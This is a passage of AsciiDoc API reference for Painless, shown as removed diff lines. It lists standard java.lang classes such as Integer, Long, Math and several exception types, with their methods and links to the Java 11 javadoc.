{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalArgumentException]] -==== IllegalArgumentException -* {java11-javadoc}/java.base/java/lang/IllegalArgumentException.html#()[IllegalArgumentException]() -* {java11-javadoc}/java.base/java/lang/IllegalArgumentException.html#(java.lang.String)[IllegalArgumentException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalMonitorStateException]] -==== IllegalMonitorStateException -* {java11-javadoc}/java.base/java/lang/IllegalMonitorStateException.html#()[IllegalMonitorStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalMonitorStateException.html#(java.lang.String)[IllegalMonitorStateException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalStateException]] -==== IllegalStateException -* {java11-javadoc}/java.base/java/lang/IllegalStateException.html#()[IllegalStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalStateException.html#(java.lang.String)[IllegalStateException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalThreadStateException]] -==== IllegalThreadStateException -* {java11-javadoc}/java.base/java/lang/IllegalThreadStateException.html#()[IllegalThreadStateException]() -* {java11-javadoc}/java.base/java/lang/IllegalThreadStateException.html#(java.lang.String)[IllegalThreadStateException](null) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IndexOutOfBoundsException]] -==== IndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/IndexOutOfBoundsException.html#()[IndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/IndexOutOfBoundsException.html#(java.lang.String)[IndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InstantiationException]] -==== InstantiationException -* {java11-javadoc}/java.base/java/lang/InstantiationException.html#()[InstantiationException]() -* {java11-javadoc}/java.base/java/lang/InstantiationException.html#(java.lang.String)[InstantiationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Integer]] -==== Integer -* static int {java11-javadoc}/java.base/java/lang/Integer.html#BYTES[BYTES] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#MAX_VALUE[MAX_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Integer.html#bitCount(int)[bitCount](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#compare(int,int)[compare](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#compareUnsigned(int,int)[compareUnsigned](int, int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#divideUnsigned(int,int)[divideUnsigned](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#hashCode(int)[hashCode](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#highestOneBit(int)[highestOneBit](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#lowestOneBit(int)[lowestOneBit](int) -* static int 
{java11-javadoc}/java.base/java/lang/Integer.html#max(int,int)[max](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#min(int,int)[min](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#numberOfLeadingZeros(int)[numberOfLeadingZeros](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#numberOfTrailingZeros(int)[numberOfTrailingZeros](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseInt(java.lang.String)[parseInt](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseInt(java.lang.String,int)[parseInt](null, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseUnsignedInt(java.lang.String)[parseUnsignedInt](null) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#parseUnsignedInt(java.lang.String,int)[parseUnsignedInt](null, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#remainderUnsigned(int,int)[remainderUnsigned](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#reverse(int)[reverse](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#reverseBytes(int)[reverseBytes](int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#rotateLeft(int,int)[rotateLeft](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#rotateRight(int,int)[rotateRight](int, int) -* static int {java11-javadoc}/java.base/java/lang/Integer.html#signum(int)[signum](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toBinaryString(int)[toBinaryString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toHexString(int)[toHexString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toOctalString(int)[toOctalString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toString(int)[toString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toString(int,int)[toString](int, int) -* static long {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedLong(int)[toUnsignedLong](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedString(int)[toUnsignedString](int) -* static null {java11-javadoc}/java.base/java/lang/Integer.html#toUnsignedString(int,int)[toUnsignedString](int, int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#valueOf(int)[valueOf](int) -* static Integer {java11-javadoc}/java.base/java/lang/Integer.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Integer.html#compareTo(java.lang.Integer)[compareTo](Integer) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InterruptedException]] -==== InterruptedException -* 
{java11-javadoc}/java.base/java/lang/InterruptedException.html#()[InterruptedException]() -* {java11-javadoc}/java.base/java/lang/InterruptedException.html#(java.lang.String)[InterruptedException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Iterable]] -==== Iterable -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* Spliterator {java11-javadoc}/java.base/java/lang/Iterable.html#spliterator()[spliterator]() -* double sum() -* double sum(ToDoubleFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Long]] -==== Long -* static int {java11-javadoc}/java.base/java/lang/Long.html#BYTES[BYTES] -* static long {java11-javadoc}/java.base/java/lang/Long.html#MAX_VALUE[MAX_VALUE] -* static long {java11-javadoc}/java.base/java/lang/Long.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Long.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Long.html#bitCount(long)[bitCount](long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#compare(long,long)[compare](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#compareUnsigned(long,long)[compareUnsigned](long, long) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#decode(java.lang.String)[decode](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#divideUnsigned(long,long)[divideUnsigned](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#hashCode(long)[hashCode](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#highestOneBit(long)[highestOneBit](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#lowestOneBit(long)[lowestOneBit](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#max(long,long)[max](long, long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#min(long,long)[min](long, long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#numberOfLeadingZeros(long)[numberOfLeadingZeros](long) -* static int {java11-javadoc}/java.base/java/lang/Long.html#numberOfTrailingZeros(long)[numberOfTrailingZeros](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseLong(java.lang.String)[parseLong](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseLong(java.lang.String,int)[parseLong](null, int) -* static long 
{java11-javadoc}/java.base/java/lang/Long.html#parseUnsignedLong(java.lang.String)[parseUnsignedLong](null) -* static long {java11-javadoc}/java.base/java/lang/Long.html#parseUnsignedLong(java.lang.String,int)[parseUnsignedLong](null, int) -* static long {java11-javadoc}/java.base/java/lang/Long.html#remainderUnsigned(long,long)[remainderUnsigned](long, long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#reverse(long)[reverse](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#reverseBytes(long)[reverseBytes](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#rotateLeft(long,int)[rotateLeft](long, int) -* static long {java11-javadoc}/java.base/java/lang/Long.html#rotateRight(long,int)[rotateRight](long, int) -* static int {java11-javadoc}/java.base/java/lang/Long.html#signum(long)[signum](long) -* static long {java11-javadoc}/java.base/java/lang/Long.html#sum(long,long)[sum](long, long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toBinaryString(long)[toBinaryString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toHexString(long)[toHexString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toOctalString(long)[toOctalString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toString(long)[toString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toString(long,int)[toString](long, int) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toUnsignedString(long)[toUnsignedString](long) -* static null {java11-javadoc}/java.base/java/lang/Long.html#toUnsignedString(long,int)[toUnsignedString](long, int) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#valueOf(long)[valueOf](long) -* static Long {java11-javadoc}/java.base/java/lang/Long.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Long.html#compareTo(java.lang.Long)[compareTo](Long) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Math]] -==== Math -* static double {java11-javadoc}/java.base/java/lang/Math.html#E[E] -* static double {java11-javadoc}/java.base/java/lang/Math.html#PI[PI] -* static double {java11-javadoc}/java.base/java/lang/Math.html#IEEEremainder(double,double)[IEEEremainder](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#abs(double)[abs](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#acos(double)[acos](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#asin(double)[asin](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#atan(double)[atan](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#atan2(double,double)[atan2](double, double) -* static double 
{java11-javadoc}/java.base/java/lang/Math.html#cbrt(double)[cbrt](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#ceil(double)[ceil](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#copySign(double,double)[copySign](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#cos(double)[cos](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#cosh(double)[cosh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#exp(double)[exp](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#expm1(double)[expm1](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#floor(double)[floor](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#hypot(double,double)[hypot](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log(double)[log](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log10(double)[log10](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#log1p(double)[log1p](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#max(double,double)[max](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#min(double,double)[min](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextAfter(double,double)[nextAfter](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextDown(double)[nextDown](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#nextUp(double)[nextUp](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#pow(double,double)[pow](double, double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#random()[random]() -* static double {java11-javadoc}/java.base/java/lang/Math.html#rint(double)[rint](double) -* static long {java11-javadoc}/java.base/java/lang/Math.html#round(double)[round](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#scalb(double,int)[scalb](double, int) -* static double {java11-javadoc}/java.base/java/lang/Math.html#signum(double)[signum](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sin(double)[sin](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sinh(double)[sinh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#sqrt(double)[sqrt](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#tan(double)[tan](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#tanh(double)[tanh](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#toDegrees(double)[toDegrees](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#toRadians(double)[toRadians](double) -* static double {java11-javadoc}/java.base/java/lang/Math.html#ulp(double)[ulp](double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NegativeArraySizeException]] -==== NegativeArraySizeException -* {java11-javadoc}/java.base/java/lang/NegativeArraySizeException.html#()[NegativeArraySizeException]() -* {java11-javadoc}/java.base/java/lang/NegativeArraySizeException.html#(java.lang.String)[NegativeArraySizeException](null) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchFieldException]] -==== NoSuchFieldException -* {java11-javadoc}/java.base/java/lang/NoSuchFieldException.html#()[NoSuchFieldException]() -* {java11-javadoc}/java.base/java/lang/NoSuchFieldException.html#(java.lang.String)[NoSuchFieldException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NoSuchMethodException]] -==== NoSuchMethodException -* {java11-javadoc}/java.base/java/lang/NoSuchMethodException.html#()[NoSuchMethodException]() -* {java11-javadoc}/java.base/java/lang/NoSuchMethodException.html#(java.lang.String)[NoSuchMethodException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NullPointerException]] -==== NullPointerException -* {java11-javadoc}/java.base/java/lang/NullPointerException.html#()[NullPointerException]() -* {java11-javadoc}/java.base/java/lang/NullPointerException.html#(java.lang.String)[NullPointerException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Number]] -==== Number -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormatException]] -==== NumberFormatException -* {java11-javadoc}/java.base/java/lang/NumberFormatException.html#()[NumberFormatException]() -* {java11-javadoc}/java.base/java/lang/NumberFormatException.html#(java.lang.String)[NumberFormatException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Object]] -==== Object -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ReflectiveOperationException]] -==== ReflectiveOperationException -* {java11-javadoc}/java.base/java/lang/ReflectiveOperationException.html#()[ReflectiveOperationException]() -* {java11-javadoc}/java.base/java/lang/ReflectiveOperationException.html#(java.lang.String)[ReflectiveOperationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RuntimeException]] -==== RuntimeException -* {java11-javadoc}/java.base/java/lang/RuntimeException.html#()[RuntimeException]() -* {java11-javadoc}/java.base/java/lang/RuntimeException.html#(java.lang.String)[RuntimeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SecurityException]] -==== SecurityException -* {java11-javadoc}/java.base/java/lang/SecurityException.html#()[SecurityException]() -* 
{java11-javadoc}/java.base/java/lang/SecurityException.html#(java.lang.String)[SecurityException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Short]] -==== Short -* static int {java11-javadoc}/java.base/java/lang/Short.html#BYTES[BYTES] -* static short {java11-javadoc}/java.base/java/lang/Short.html#MAX_VALUE[MAX_VALUE] -* static short {java11-javadoc}/java.base/java/lang/Short.html#MIN_VALUE[MIN_VALUE] -* static int {java11-javadoc}/java.base/java/lang/Short.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Short.html#compare(short,short)[compare](short, short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#decode(java.lang.String)[decode](null) -* static int {java11-javadoc}/java.base/java/lang/Short.html#hashCode(short)[hashCode](short) -* static short {java11-javadoc}/java.base/java/lang/Short.html#parseShort(java.lang.String)[parseShort](null) -* static short {java11-javadoc}/java.base/java/lang/Short.html#parseShort(java.lang.String,int)[parseShort](null, int) -* static short {java11-javadoc}/java.base/java/lang/Short.html#reverseBytes(short)[reverseBytes](short) -* static null {java11-javadoc}/java.base/java/lang/Short.html#toString(short)[toString](short) -* static int {java11-javadoc}/java.base/java/lang/Short.html#toUnsignedInt(short)[toUnsignedInt](short) -* static long {java11-javadoc}/java.base/java/lang/Short.html#toUnsignedLong(short)[toUnsignedLong](short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#valueOf(short)[valueOf](short) -* static Short {java11-javadoc}/java.base/java/lang/Short.html#valueOf(java.lang.String,int)[valueOf](null, int) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Short.html#compareTo(java.lang.Short)[compareTo](Short) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StackTraceElement]] -==== StackTraceElement -* {java11-javadoc}/java.base/java/lang/StackTraceElement.html#(java.lang.String,java.lang.String,java.lang.String,int)[StackTraceElement](null, null, null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/StackTraceElement.html#getClassName()[getClassName]() -* null 
